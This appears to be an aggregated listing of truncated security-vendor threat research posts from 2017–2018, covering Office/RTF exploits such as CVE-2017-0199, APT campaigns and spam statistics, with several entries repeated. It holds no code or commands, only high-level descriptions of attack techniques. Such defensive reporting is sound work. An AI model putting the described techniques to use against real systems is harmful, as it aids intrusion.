Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Fortinet
A root cause analysis of CVE-2018-0797 - Rich Text Format Stylesheet Use-After-Free vulnerability
blogs_fortinet·2018-04-01·CVSS 7.8
CVE-2018-0797 [HIGH] A root cause analysis of CVE-2018-0797 - Rich Text Format Stylesheet Use-After-Free vulnerability
FORTIGUARD LABS THREAT RESEARCH
A root cause analysis of CVE-2018-0797 - Rich Text Format Stylesheet Use-After-Free vulnerability
By Wayne Chin Yick Low | April 01, 2018
Over the last few months, the Microsoft Security Response Centre (MSRC) has released a number of Windows updates to fix multiple Use-After-Free (UAF) vulnerabilities discovered by FortiGuard Labs. As stated in our previous blog post, we will provide a technical write-up for one of the UAF issues that was rated as critical by MSRC. The issue is assigned to CVE-2018-0797. In this blog post we will share our methodologies in identifying the root cause of the issue, as well as an analysis of the mitigation deployed by Microsoft to address the UAF vulnerability.
Please take note that the following analysis was performed on M
Fortinet
FortiGuard Labs Discovers Multiple Use-After-Free Vulnerabilities in Microsoft Word
blogs_fortinet·2018-03-22·CVSS 7.8
[HIGH] FortiGuard Labs Discovers Multiple Use-After-Free Vulnerabilities in Microsoft Word
FORTIGUARD LABS THREAT RESEARCH
FortiGuard Labs Discovers Multiple Use-After-Free Vulnerabilities in Microsoft Word
By Wayne Chin Yick Low | March 22, 2018
During the last few months, FortiGuard Labs discovered and reported multiple use-after-free (UAF) vulnerabilities found in different versions of Microsoft Word. These vulnerabilities were patched in the January and March security updates, respectively. These patches are rated as critical/important, and as always, we urge users update Microsoft Office as soon as possible.
Use-after-free refers to a vulnerability that allows an attacker to access memory after it has been freed, which can cause a program to crash, allow the execution of arbitrary code, or even enable full remote code execution. Following are some details of the UAF vuln
Zscaler
Malicious RTF Documents Spreading Malware | Zscaler Blog
blogs_zscaler·2018-02-20
Malicious RTF Documents Spreading Malware | Zscaler Blog
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Fortinet
FortiGuard Labs Discovers Vulnerability in Asus Router
blogs_fortinet·2018-01-30·CVSS 9.8
[CRITICAL] FortiGuard Labs Discovers Vulnerability in Asus Router
FORTIGUARD LABS THREAT RESEARCH
FortiGuard Labs Discovers Vulnerability in Asus Router
By David Maciejak | January 30, 2018
Over the last few weeks, ASUS released a series of patches aimed at addressing a number of vulnerabilities discovered in their RT routers running AsusWRT firmware. The models listed at the end of this post are known to be vulnerable. If you are not sure which model or firmware you are using, I recommend double-checking the ASUS support website to get the latest information and updates.
FG-VD-17-216 is an ASUS authenticated remote code execution vulnerability that FortiGuard Labs originally discovered and reported (CVE-2018-9285). If your web management portal is available via your WAN connection, and you don’t use that feature, we recommend disabling it (it’s not
Unit42
The TopHat Campaign: Attacks Within The Middle East Region Using Popular Third-Party Services
blogs_unit42·2018-01-26
The TopHat Campaign: Attacks Within The Middle East Region Using Popular Third-Party Services
## The TopHat Campaign: Attacks Within The Middle East Region Using Popular Third-Party Services
Josh Grunzweig
Published: January 26, 2018
Malware
Nation-State Cyberattacks
Threat Research
Core
DustySky
Palestinian Territories
Scote
TopHat
Summary
In recent months, Palo Alto Networks Unit 42 observed a wave of attacks leveraging popular third-party services Google+, Pastebin, and bit.ly. Attackers used Arabic language decoy documents related to current events within the Palestine Territories as lures to entice victims to open and subsequently be infected by the malware. There is data indicating that these attacks are targeting individuals or organizations within the Palestinian Territories, which is detailed later.
The attacks themselves are deployed via four different means,
Unit42
The TopHat Campaign: Attacks Within The Middle East Region Using Popular Third-Party Services
blogs_unit42·2018-01-26
The TopHat Campaign: Attacks Within The Middle East Region Using Popular Third-Party Services
Summary
In recent months, Palo Alto Networks Unit 42 observed a wave of attacks leveraging popular third-party services Google+, Pastebin, and bit.ly. Attackers used Arabic language decoy documents related to current events within the Palestine Territories as lures to entice victims to open and subsequently be infected by the malware. There is data indicating that these attacks are targeting individuals or organizations within the Palestinian Territories, which is detailed later.
The attacks themselves are deployed via four different means, two involving malicious RTF files, one involving self-extracting Windows executables, and the final using RAR archives.
The ultimate payload is a new malware family that we have dubbed “Scote” based on strings we found within the malware samples. Sco
Talos
Korea In The Crosshairs
blogs_talos·2018-01-16·CVSS 7.8
[HIGH] Korea In The Crosshairs
This blog post is authored by Warren Mercer and Paul Rascagneres and with contributions from Jungsoo An.
A one year review of campaigns performed by an actor with multiple campaigns mainly linked to South Korean targets.
## Executive SummaryThis article exposes the malicious activities of Group 123 during 2017. We assess with high confidence that Group 123 was responsible for the following six campaigns:
- "Golden Time" campaign.
- "Evil New Year" campaign.
- "Are you Happy?" campaign.
- "FreeMilk" campaign.
- "North Korean Human Rights" campaign.
- "Evil New Year 2018" campaign.
On January 2nd of 2018, the "Evil New Year 2018" was started. This campaign copies the approach of the 2017 "Evil New Year" campaign.
The links between the different campaigns include shared code and compiler a
Talos
Korea In The Crosshairs
blogs_talos·2018-01-16·CVSS 7.8
[HIGH] Korea In The Crosshairs
## Korea In The Crosshairs
This blog post is authored by Warren Mercer and Paul Rascagneres and with contributions from Jungsoo An. A one year review of campaigns performed by an actor with multiple campaigns mainly linked to South Korean targets.
## Executive Summary This article exposes the malicious activities of Group 123 during 2017. We assess with high confidence that Group 123 was responsible for the following six campaigns:
"Golden Time" campaign.
"Evil New Year" campaign.
"Are you Happy?" campaign.
"FreeMilk" campaign.
"North Korean Human Rights" campaign.
"Evil New Year 2018" campaign. On January 2nd of 2018, the "Evil New Year 2018" was started. This campaign copies the approach of the 2017 "Evil New Year" campaign.
The links between the different campaigns include shar
Trendmicro
Untangling the Patchwork Cyberespionage Group
blogs_trendmicro·2017-12-11
Untangling the Patchwork Cyberespionage Group
Cyber Crime
# Untangling the Patchwork Cyberespionage Group
Patchwork (also known as Dropping Elephant) is a cyberespionage group known for targeting diplomatic and government agencies that has since added businesses to their list of targets.
By: Daniel Lunghi, Jaromir Horejsi, Cedric Pernet
2017/12/11
Read time: ( words)
Save to Folio
Updated as of October 9, 2018, 7:24PM PDT to remove Socksbot and update the appendix and technical brief; hat tip to Michael Yip of Accenture Security for an earlier research on Socksbot.
Patchwork (also known as Dropping Elephant) is a cyberespionage group known for targeting diplomatic and government agencies that has since added businesses to their list of targets. Patchwork’s moniker is from its notoriety for rehashing off-the-rack tools and malwa
Fortinet
Cobalt Malware Strikes Using CVE-2017-11882 RTF Vulnerability
blogs_fortinet·2017-11-27·CVSS 7.8
CVE-2017-11882 [HIGH] Cobalt Malware Strikes Using CVE-2017-11882 RTF Vulnerability
FORTIGUARD LABS THREAT RESEARCH
Cobalt Malware Strikes Using CVE-2017-11882 RTF Vulnerability
By Jasper Manual and Joie Salvio | November 27, 2017
Only a few days after FortiGuard Labs published an article about a spam campaign exploiting an RTF document, our Kadena Threat Intelligence System (KTIS) has found another spam campaign using an even more recent document vulnerability, CVE-2017-11882. Although the vulnerability has existed for 17 years, according to a report by SecurityWeek, it was only disclosed and patched by Microsoft in the second week of this month.
And as we have repeatedly seen, not long after its disclosure threat actors were quick to take advantage of this vulnerability to deliver a malware using a component from a well-known penetration testing tool, Cobalt Strike.
Fortinet
CVE-2017-11826 Exploited in the Wild with Politically Themed RTF Document
blogs_fortinet·2017-11-22·CVSS 7.8
CVE-2017-11826 [HIGH] CVE-2017-11826 Exploited in the Wild with Politically Themed RTF Document
FORTIGUARD LABS THREAT RESEARCH
CVE-2017-11826 Exploited in the Wild with Politically Themed RTF Document
By Jasper Manuel, Joie Salvio and Wayne Low | November 22, 2017
Recently, FortiGuard Labs found an interesting malware campaign using the recently documented vulnerability CVE-2017-11826 that was patched by Microsoft in October of this year. A detailed analysis of this exploit is also included in this article.
Based on the context of the campaign used to lure victims, as well as how the payload malware behaves, we had a hunch that this was not a common cybercrime campaign and was even possibly a targeted attack on specific institutions or locales. For this reason, we decided to look deeper.
As is common with this type of attack, the command-and-control (C2) server for this campaign
Securelist
APT Trends report Q3 2017
blogs_securelist·2017-11-14
APT Trends report Q3 2017
Table of Contents
Introduction
Chinese-Speaking Actors
Russian-Speaking Actors
English-Speaking Actors
Korean-Speaking Actors
Other Activity
Final Thoughts
Authors
GReAT
## Introduction
Beginning in the second quarter of 2017, Kaspersky’s Global Research and Analysis Team (GReAT) began publishing summaries of the quarter’s private threat intelligence reports in an effort to make the public aware of what research we have been conducting. This report serves as the next installment, focusing on important reports produced during Q3 of 2017.
As stated last quarter, these reports will serve as a representative snapshot of what has been offered in greater detail in our private reports in order to highlight significant events and findings we feel most should be aware of. For brevity’s
Securelist
APT Trends report Q3 2017 | Securelist
blogs_securelist·2017-11-14
APT Trends report Q3 2017 | Securelist
Table of Contents
- Introduction
- Chinese-Speaking Actors
- Russian-Speaking Actors
- English-Speaking Actors
- Korean-Speaking Actors
- Other Activity
- Final Thoughts
Authors
- GReAT
## Introduction
Beginning in the second quarter of 2017, Kaspersky’s Global Research and Analysis Team (GReAT) began publishing summaries of the quarter’s private threat intelligence reports in an effort to make the public aware of what research we have been conducting. This report serves as the next installment, focusing on important reports produced during Q3 of 2017.
As stated last quarter, these reports will serve as a representative snapshot of what has been offered in greater detail in our private reports in order to highlight significant events and findings we feel most should be aware of. For
Securelist
IT threat evolution Q3 2017. Statistics
blogs_securelist·2017-11-10
IT threat evolution Q3 2017. Statistics
Table of Contents
Q3 figures
Mobile threats
Q3 events
The spread of the Asacub banker
New capabilities of mobile banking Trojans
The growth of WAP billing subscriptions
Mobile threat statistics
Distribution of mobile malware by type
TOP 20 mobile malware programs
The geography of mobile threats
Mobile banking Trojans
Mobile ransomware
Vulnerable apps exploited by cybercriminals
Online threats (Web-based attacks)
Online threats in the banking sector
Geography of attacks
TOP 10 banking malware families
Cryptoware programs
Q3 highlights
Crysis rises from the dead
Surge in Cryrar attacks
Master key to original versions of Petya/Mischa/GoldenEye published
The number of new modifications
The number of users attacked by ransomware
The geography of attacks
Top 10 countrie
Securelist
IT threat evolution Q3 2017. Statistics
blogs_securelist·2017-11-10
IT threat evolution Q3 2017. Statistics
Table of Contents
- Q3 figures
- Mobile threats
- Vulnerable apps exploited by cybercriminals
- Online threats (Web-based attacks)
- Local threats
Authors
- Roman Unuchek
- Fedor Sinitsyn
- Denis Parinov
- Alexander Liskin
## Q3 figures
According to KSN data, Kaspersky Lab solutions detected and repelled 277,646,376 malicious attacks from online resources located in 185 countries all over the world.
72,012,219 unique URLs were recognized as malicious by web antivirus components.
Attempted infections by malware that aims to steal money via online access to bank accounts were registered on 204,388 user computers.
Crypto ransomware attacks were blocked on 186283 computers of unique users.
Kaspersky Lab’s file antivirus detected a total of 198,228,428 unique malicious and potentially
Securelist
Spam and phishing in Q3 2017
blogs_securelist·2017-11-03
Spam and phishing in Q3 2017
Table of Contents
Quarterly highlights
Blockchain and spam
Fraud, cryptocurrencies and binary options
Webcasts
Natural disasters and the ‘White House administration’
B2B fakes in malicious emails
Release of new iPhone
Statistics
Proportion of spam in email traffic
Sources of spam by country
Spam email size
Malicious attachments in email
Top 10 malware families
Countries targeted by malicious mailshots
Phishing
Geography of attacks
Organizations under attack
Rating the categories of organizations attacked by phishers
Hot topics this quarter
Airline tickets
WhatsApp
Netflix
Green Card
Rap battle
TOP 3 attacked organizations
Conclusion
Authors
Darya Gudkova
Maria Vergelis
Tatyana Shcherbakova
Nadezhda Demidova
## Quarterly highlights
## Blockchain and spam
Cr
Securelist
Spam and phishing in Q3 2017
blogs_securelist·2017-11-03
Spam and phishing in Q3 2017
Table of Contents
- Quarterly highlights
- Statistics
- Phishing
- Conclusion
Authors
- Darya Gudkova
- Maria Vergelis
- Tatyana Shcherbakova
- Nadezhda Demidova
## Quarterly highlights
### Blockchain and spam
Cryptocurrencies have been a regular theme in the media for several years now. Financial analysts predict a great future for them, various governments are thinking about launching their own currencies, and graphics cards are swept off the shelves as soon as they go on sale. Of course, spammers could not resist the topics of cryptocurrency, mining and blockchain technology.
Last quarter we wrote that many Trojans were downloading ‘miners’ as a payload on victims’ computers, and in third quarter of 2017 this practice became even more widespread.
#### Fraud, cryptocurrencies an
Securelist
Gaza Cybergang – updated activity in 2017:
blogs_securelist·2017-10-30
Gaza Cybergang – updated activity in 2017:
Authors
Mohamad Amin Hasbini
Ghareeb Saad
## New targets, use of MS Access Macros and CVE 2017-0199, and possible mobile espionage
## 1. Summary information
The Gaza cybergang is an Arabic-language, politically-motivated cybercriminal group, operating since 2012 and actively targeting the MENA (Middle East North Africa) region. The Gaza cybergang’s attacks have never slowed down and its typical targets include government entities/embassies, oil and gas, media/press, activists, politicians, and diplomats.
One of the interesting new facts, uncovered in mid-2017, is its discovery inside an oil and gas organization in the MENA region, infiltrating systems and pilfering data, apparently for more than a year.
Another interesting finding is the use of the recently discovered CVE 2017-0199
Securelist
Gaza Cybergang – updated activity in 2017:
blogs_securelist·2017-10-30
Gaza Cybergang – updated activity in 2017:
Authors
- Mohamad Amin Hasbini
- Ghareeb Saad
## New targets, use of MS Access Macros and CVE 2017-0199, and possible mobile espionage
## 1. Summary information
The Gaza cybergang is an Arabic-language, politically-motivated cybercriminal group, operating since 2012 and actively targeting the MENA (Middle East North Africa) region. The Gaza cybergang’s attacks have never slowed down and its typical targets include government entities/embassies, oil and gas, media/press, activists, politicians, and diplomats.
One of the interesting new facts, uncovered in mid-2017, is its discovery inside an oil and gas organization in the MENA region, infiltrating systems and pilfering data, apparently for more than a year.
Another interesting finding is the use of the recently discovered CVE 2017-01
Unit42
Tracking Subaat: Targeted Phishing Attack Leads to Threat Actor's Repository
blogs_unit42·2017-10-27·CVSS 8.8
CVE-2012-0158 [HIGH] Tracking Subaat: Targeted Phishing Attack Leads to Threat Actor's Repository
## Tracking Subaat: Targeted Phishing Attack Leads to Threat Actor's Repository
Unit 42
Published: October 27, 2017
Malware
Threat Research
Vulnerabilities
CVE-2012-0158
Downloader
Phishing
QuasarRAT
Subaat
In mid-July, Palo Alto Networks Unit 42 identified a small targeted phishing campaign aimed at a government organization. While tracking the activities of this campaign, we identified a repository of additional malware, including a web server that was used to host the payloads used for both this attack as well as others. We’ll discuss how we discovered it, as well as possible attribution towards the individual behind these attacks.
The Initial Attack
Beginning on July 16, 2017, Unit 42 observed a small wave of phishing emails targeting a US-based government organization. W
Unit42
Tracking Subaat: Targeted Phishing Attack Leads to Threat Actor's Repository
blogs_unit42·2017-10-27·CVSS 8.8
[HIGH] Tracking Subaat: Targeted Phishing Attack Leads to Threat Actor's Repository
In mid-July, Palo Alto Networks Unit 42 identified a small targeted phishing campaign aimed at a government organization. While tracking the activities of this campaign, we identified a repository of additional malware, including a web server that was used to host the payloads used for both this attack as well as others. We’ll discuss how we discovered it, as well as possible attribution towards the individual behind these attacks.
The Initial Attack
Beginning on July 16, 2017, Unit 42 observed a small wave of phishing emails targeting a US-based government organization. We observed a total of 43 emails with the following subject lines:
- Invention
- Invention Event
Within the 43 emails we observed, we found that three unique files were delivered, which consisted of two RTFs and a Micr
Unit42
OilRig Group Steps Up Attacks with New Delivery Documents and New Injector Trojan
blogs_unit42·2017-10-09
OilRig Group Steps Up Attacks with New Delivery Documents and New Injector Trojan
Unit 42’s ongoing research into the OilRig campaign shows that the threat actors involved in the original attack campaign continue to add new Trojans to their toolset and continue their persistent attacks in the Middle East. When we first discovered the OilRig attack campaign in May 2016, we believed at the time it was a unique attack campaign likely operated by a known, existing threat group. As we have progressed in our research and uncovered additional attack phases, tooling, and infrastructure as discussed in our recent posting “Striking Oil: A Closer Look at Adversary Infrastructure”, it has become apparent that the threat group responsible for the OilRig attack campaign is likely to be a unique, previously unknown adversary. Additionally, others have been referring to the group respo
Unit42
OilRig Group Steps Up Attacks with New Delivery Documents and New Injector Trojan
blogs_unit42·2017-10-09·CVSS 7.8
CVE-2017-0199 [HIGH] OilRig Group Steps Up Attacks with New Delivery Documents and New Injector Trojan
## OilRig Group Steps Up Attacks with New Delivery Documents and New Injector Trojan
Robert Falcone
Bryan Lee
Published: October 9, 2017
Malware
Threat Research
ISMAgent
ISMInjector CVE-2017-0199
OilRig
ThreeDollars
Unit 42’s ongoing research into the OilRig campaign shows that the threat actors involved in the original attack campaign continue to add new Trojans to their toolset and continue their persistent attacks in the Middle East. When we first discovered the OilRig attack campaign in May 2016, we believed at the time it was a unique attack campaign likely operated by a known, existing threat group. As we have progressed in our research and uncovered additional attack phases, tooling, and infrastructure as discussed in our recent posting “ Striking Oil: A Closer Look at Ad
Unit42
FreeMilk: A Highly Targeted Spear Phishing Campaign
blogs_unit42·2017-10-05·CVSS 7.8
CVE-2017-0199 [HIGH] FreeMilk: A Highly Targeted Spear Phishing Campaign
## FreeMilk: A Highly Targeted Spear Phishing Campaign
Juan Cortes
Esmid Idrizovic
Published: October 5, 2017
Malware
Threat Research
FreeMilk
Freenki
N1stAgent
PoohMilk
Spear Phishing
In May 2017, Palo Alto Networks Unit 42 identified a limited spear phishing campaign targeting various individuals across the world. The threat actor leveraged the CVE-2017-0199 Microsoft Word Office/WordPad Remote Code Execution Vulnerability with carefully crafted decoy content customized for each target recipient. Our research showed that the spear phishing emails came from multiple compromised email accounts tied to a legitimate domain in North East Asia. We believe that the threat actor hijacked an existing, legitimate in-progress conversation and posed as the legitimate senders to send mali
Unit42
FreeMilk: A Highly Targeted Spear Phishing Campaign
blogs_unit42·2017-10-05·CVSS 7.8
CVE-2017-0199 [HIGH] FreeMilk: A Highly Targeted Spear Phishing Campaign
In May 2017, Palo Alto Networks Unit 42 identified a limited spear phishing campaign targeting various individuals across the world. The threat actor leveraged the CVE-2017-0199 Microsoft Word Office/WordPad Remote Code Execution Vulnerability with carefully crafted decoy content customized for each target recipient. Our research showed that the spear phishing emails came from multiple compromised email accounts tied to a legitimate domain in North East Asia. We believe that the threat actor hijacked an existing, legitimate in-progress conversation and posed as the legitimate senders to send malicious spear phishing emails to the recipients as shown below in Figure 1.
Figure 1 Conversation Hijacking to Deliver Malware
Upon successful exploitation, the malicious document delivered two mal
Talos
Threat Round Up For Sept 8 - Sept 15
blogs_talos·2017-09-15·CVSS 7.8
[HIGH] Threat Round Up For Sept 8 - Sept 15
## Threat Round Up For Sept 8 - Sept 15
Today, Talos is publishing a glimpse into the most prevalent threats we've observed between September 08 and September 15. As with previous round-ups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavior characteristics, indicators of compromise, and how our customers are automatically protected from these threats.
As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of date of publication. Detection and coverage for the following threats is subject to updates pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org,
Talos
Threat Round Up For Sept 8 - Sept 15
blogs_talos·2017-09-15·CVSS 7.8
[HIGH] Threat Round Up For Sept 8 - Sept 15
Today, Talos is publishing a glimpse into the most prevalent threats we've observed between September 08 and September 15. As with previous round-ups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavior characteristics, indicators of compromise, and how our customers are automatically protected from these threats.
As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of date of publication. Detection and coverage for the following threats is subject to updates pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.
The most prevalent threa
Trendmicro
A360 Drive Abused, Spreads Adwind, Remcos, Netwire RAT
blogs_trendmicro·2017-09-05
A360 Drive Abused, Spreads Adwind, Remcos, Netwire RAT
Malware
# A360 Drive Abused, Spreads Adwind, Remcos, Netwire RAT
We saw an attack on Autodesk® A360, comparable to the way file-sharing sites are being used to host malware. Abusing A360 as a malware delivery platform can enable attacks that are less likely to raise red flags.
By: Jaromir Horejsi
2017/09/05
Read time: ( words)
Save to Folio
Updated as of September 6, 2017, 2:39 AM PDT, to include U.K. as one of the top countries most affected by A360 Drive-hosted malware.
Cloud-based storage platforms have a history of cybercriminal abuse, from hosting malicious files and directly delivering malware to even making them part of a command-and-control (C&C) infrastructure. GitHub was misused this way when the Winnti group used it as a conduit for its C&C communications.
We saw a simil
Fortinet
PowerPoint File Armed with CVE-2017-0199 and UAC Bypass
blogs_fortinet·2017-09-01·CVSS 7.8
CVE-2017-0199 [HIGH] PowerPoint File Armed with CVE-2017-0199 and UAC Bypass
FORTIGUARD LABS THREAT RESEARCH
PowerPoint File Armed with CVE-2017-0199 and UAC Bypass
By Rommel Joven and Jasper Manuel | September 01, 2017
FortiGuard Labs recently discovered a new malicious PowerPoint file named ADVANCED DIPLOMATIC PROTOCOL AND ETIQUETTE SUMMIT.ppsx. Taking a look at the four slides of the PowerPoint Open XML Slide Show (PPSX) file, we can tell that it targets people from UN agencies, Foreign Ministries, International Organizations, and those who interact with international governments.
We will take a look on how opening this PowerPoint file could compromise your system.
Here’s an overview on how the attack works:
Figure 01: Flow of the attack process
CVE-2017-0199
This exploit targets a vulnerability identified as CVE-2017-0199, which was disclosed and patch
Fortinet
Deep Analysis of New Poison Ivy Variant
blogs_fortinet·2017-08-23
Deep Analysis of New Poison Ivy Variant
FORTIGUARD LABS THREAT RESEARCH
Deep Analysis of New Poison Ivy Variant
By Xiaopeng Zhang | August 23, 2017
Recently, the FortiGuard Labs research team observed that a new variant of Poison Ivy was being spread through a compromised PowerPoint file. We captured a PowerPoint file named Payment_Advice.ppsx, which is in OOXML format. Once the victim opens this file using the MS PowerPoint program, the malicious code contained in the file is executed. It downloads the Poison Ivy malware onto the victim’s computer and then launches it. In this blog, I’ll show the details of how this happens, what techniques are used by this malware, as well as what it does to the victim’s computer.
The PowerPoint Sample
Figure 1 shows a screenshot of when the ppsx file is opened.
Figure 1. Open Payment_Adv
Securelist
Spam and phishing in Q2 2017
blogs_securelist·2017-08-22
Spam and phishing in Q2 2017
Table of Contents
Spam: quarterly highlights
Delivery service Trojans
WannaCry in spam
Malware in password-protected archives and the corporate sector
Necurs botnet continues to distribute spam
Spam via legal services
Domain fraud
Statistics
Proportion of spam in email traffic
Sources of spam by country
Spam email size
Malicious attachments in email
Top 10 malware families
Countries targeted by malicious mailshots
Phishing
Geography of attacks
Organizations under attack
Rating the categories of organizations attacked by phishers
Hot topics this quarter
Airline tickets
False browser blocking
Punycode encoding
Attacks on Uber users
TOP 3 attacked organizations
Conclusion
Authors
Darya Gudkova
Maria Vergelis
Tatyana Shcherbakova
Nadezhda Demidova
## Spam: quarte
Securelist
Spam and phishing in Q2 2017
blogs_securelist·2017-08-22
Spam and phishing in Q2 2017
Table of Contents
- Spam: quarterly highlights
- Statistics
- Malicious attachments in email
- Phishing
- Conclusion
Authors
- Darya Gudkova
- Maria Vergelis
- Tatyana Shcherbakova
- Nadezhda Demidova
## Spam: quarterly highlights
### Delivery service Trojans
At the start of Q2 2017, we registered a wave of malicious mailings imitating notifications from well-known delivery services. Trojan downloaders were sent out in ZIP archives, and after being launched they downloaded other malware – Backdoor.Win32.Androm and Trojan.Win32.Kovter. The usual trick of presenting dangerous content as important delivery information was employed by the fraudsters to make recipients open the attachment. The malicious mailings targeted people from different countries and came in a variety of languages.
Securelist
IT threat evolution Q2 2017. Statistics
blogs_securelist·2017-08-15
IT threat evolution Q2 2017. Statistics
Table of Contents
Q2 figures
Mobile threats
Q2 events
SMS spam
Revamped ZTorg
Meet the new Trojan – Dvmap
WAP billing subscriptions
Mobile threat statistics
Distribution of mobile malware by type
TOP 20 mobile malware programs
The geography of mobile threats
Mobile banking Trojans
Mobile Ransomware
Vulnerable apps exploited by cybercriminals
Online threats (Web-based attacks)
Online threats in the banking sector
Geography of attacks
The TOP 10 banking malware families
Ransomware Trojans
The number of new modifications
The number of users attacked by ransomware
The geography of attacks
Top 10 countries attacked by cryptors
Top 10 most widespread cryptor families
Top 10 countries where online resources are seeded with malware
Countries where users faced the greatest
Securelist
IT threat evolution Q2 2017. Statistics
blogs_securelist·2017-08-15
IT threat evolution Q2 2017. Statistics
Table of Contents
- Q2 figures
- Mobile threats
- Vulnerable apps exploited by cybercriminals
- Online threats (Web-based attacks)
- Local threats
Authors
- Roman Unuchek
- Fedor Sinitsyn
- Denis Parinov
- Alexander Liskin
## Q2 figures
According to KSN data, Kaspersky Lab solutions detected and repelled 342, 566, 061 malicious attacks from online resources located in 191 countries all over the world.
33, 006, 783 unique URLs were recognized as malicious by web antivirus components.
Attempted infections by malware that aims to steal money via online access to bank accounts were registered on 224, 675 user computers.
Crypto ransomware attacks were blocked on 246, 675 computers of unique users.
Kaspersky Lab’s file antivirus detected a total of 185, 801, 835 unique malicious and pot
Trendmicro
CVE-2017-0199: New Malware Abuses PowerPoint Slides
blogs_trendmicro·2017-08-14·CVSS 7.8
CVE-2017-0199 [HIGH] CVE-2017-0199: New Malware Abuses PowerPoint Slides
Exploits & Vulnerabilities
# CVE-2017-0199: New Malware Abuses PowerPoint Slides
We recently observed a new malwae type exploiting CVE-2017-0199 using a new method that abuses PowerPoint Slide Show—the first time we have seen this approach used in the wild.
By: Ronnie Giagone, Rubio Wu
2017/08/14
Read time: ( words)
Save to Folio
CVE-2017-0199 was originally a zero-day remote code execution vulnerability that allowed attackers to exploit a flaw that exists in the Windows Object Linking and Embedding (OLE) interface of Microsoft Office to deliver malware. It is commonly exploited via the use of malicious Rich Text File (RTF) documents, a method used by the DRIDEX banking trojan discovered earlier this year.
We recently observed a new sample (Detected by Trend Micro as TROJ_CVE2017019
Trendmicro
CVE-2017-0199: New Malware Abuses PowerPoint Slides
blogs_trendmicro·2017-08-14·CVSS 7.8
CVE-2017-0199 [HIGH] CVE-2017-0199: New Malware Abuses PowerPoint Slides
Exploits & Vulnerabilities
## CVE-2017-0199: New Malware Abuses PowerPoint Slides
We recently observed a new malwae type exploiting CVE-2017-0199 using a new method that abuses PowerPoint Slide Show—the first time we have seen this approach used in the wild.
By: Ronnie Giagone, Rubio Wu 2017/08/14 Read time: ( words)
Save to Folio
CVE-2017-0199 was originally a zero-day remote code execution vulnerability that allowed attackers to exploit a flaw that exists in the Windows Object Linking and Embedding (OLE) interface of Microsoft Office to deliver malware. It is commonly exploited via the use of malicious Rich Text File (RTF) documents, a method used by the DRIDEX banking trojan discovered earlier this year.
We recently observed a new sample (Detected by Trend Micro as TROJ_CVE2017019
Talos
When combining exploits for added effect goes wrong
blogs_talos·2017-08-14·CVSS 8.8
CVE-2017-0199 [HIGH] When combining exploits for added effect goes wrong
### IntroductionSince public disclosure in April 2017,CVE-2017-0199has been frequently used within malicious Office documents. The vulnerability allows attackers to include Ole2Link objects within RTF documents to launch remote code when HTA applications are opened and parsed by Microsoft Word.
In this recent campaign, attackers combined CVE-2017-0199 exploitation with an earlier exploit, CVE-2012-0158, possibly in an attempt to evade user prompts by Word, or to arrive at code execution via a different mechanism. Potentially, this was just a test run in order to test a new concept. In any case, the attackers made mistakes which caused the attack to be a lot less effective than it could have been.
Analysis of the payload highlights the potential for the Ole2Link exploit to launch other do
Trendmicro
CVE-2017-0199: New Malware Abuses PowerPoint Slides
blogs_trendmicro·2017-08-14·CVSS 7.8
CVE-2017-0199 [HIGH] CVE-2017-0199: New Malware Abuses PowerPoint Slides
Exploits & Vulnerabilities
## CVE-2017-0199: New Malware Abuses PowerPoint Slides
We recently observed a new malwae type exploiting CVE-2017-0199 using a new method that abuses PowerPoint Slide Show—the first time we have seen this approach used in the wild.
By: Ronnie Giagone, Rubio Wu Aug 14, 2017 Read time: ( words)
Save to Folio
CVE-2017-0199 was originally a zero-day remote code execution vulnerability that allowed attackers to exploit a flaw that exists in the Windows Object Linking and Embedding (OLE) interface of Microsoft Office to deliver malware. It is commonly exploited via the use of malicious Rich Text File (RTF) documents, a method used by the DRIDEX banking trojan discovered earlier this year.
We recently observed a new sample (Detected by Trend Micro as TROJ_CVE20170
Trendmicro
CVE-2017-0199: New Malware Abuses PowerPoint Slides
blogs_trendmicro·2017-08-14·CVSS 7.8
CVE-2017-0199 [HIGH] CVE-2017-0199: New Malware Abuses PowerPoint Slides
Sfruttamento vulnerabilità
## CVE-2017-0199: New Malware Abuses PowerPoint Slides
We recently observed a new malwae type exploiting CVE-2017-0199 using a new method that abuses PowerPoint Slide Show—the first time we have seen this approach used in the wild.
By: Ronnie Giagone, Rubio Wu Aug 14, 2017 Read time: ( words)
Save to Folio
CVE-2017-0199 was originally a zero-day remote code execution vulnerability that allowed attackers to exploit a flaw that exists in the Windows Object Linking and Embedding (OLE) interface of Microsoft Office to deliver malware. It is commonly exploited via the use of malicious Rich Text File (RTF) documents, a method used by the DRIDEX banking trojan discovered earlier this year.
We recently observed a new sample (Detected by Trend Micro as TROJ_CVE20170
Trendmicro
CVE-2017-0199: New Malware Abuses PowerPoint Slides
blogs_trendmicro·2017-08-14·CVSS 7.8
CVE-2017-0199 [HIGH] CVE-2017-0199: New Malware Abuses PowerPoint Slides
Ausnutzung von Schwachstellen
## CVE-2017-0199: New Malware Abuses PowerPoint Slides
We recently observed a new malwae type exploiting CVE-2017-0199 using a new method that abuses PowerPoint Slide Show—the first time we have seen this approach used in the wild.
By: Ronnie Giagone, Rubio Wu Aug 14, 2017 Read time: ( words)
Save to Folio
